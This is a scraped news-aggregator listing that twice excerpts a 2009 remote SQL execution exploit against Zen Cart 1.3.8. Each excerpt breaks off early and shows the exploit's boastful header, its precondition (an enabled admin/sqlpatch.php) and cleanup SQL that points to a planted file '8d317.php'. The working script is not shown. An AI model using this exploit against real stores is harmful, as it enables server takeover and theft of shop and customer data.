Zen Cart 1.3.8 Remote SQL Execution Exploit

jason — Wed, 01 Jul 2009 05:59:00 +0000

# ——- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce – putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#

#!/usr/bin/python
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
#    DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
#    DELETE FROM `record_company` WHERE `record_company_image`

… Read the rest

Zen Cart 1.3.8 Remote SQL Execution Exploit

jason — Wed, 24 Jun 2009 07:29:29 +0000

#
# ——- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce – putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#

#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
# DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = ’8d317.php’ LIMIT 1);
# DELETE FROM `record_company` WHERE `record_company_image` = ’8d317.php’;

#!/usr/bin/python

import urllib, urllib2, re, sys… Read the rest

GO IT WORLD | IT TECH | IT NEWS » zen cart

Zen Cart 1.3.8 Remote SQL Execution Exploit

Zen Cart 1.3.8 Remote SQL Execution Exploit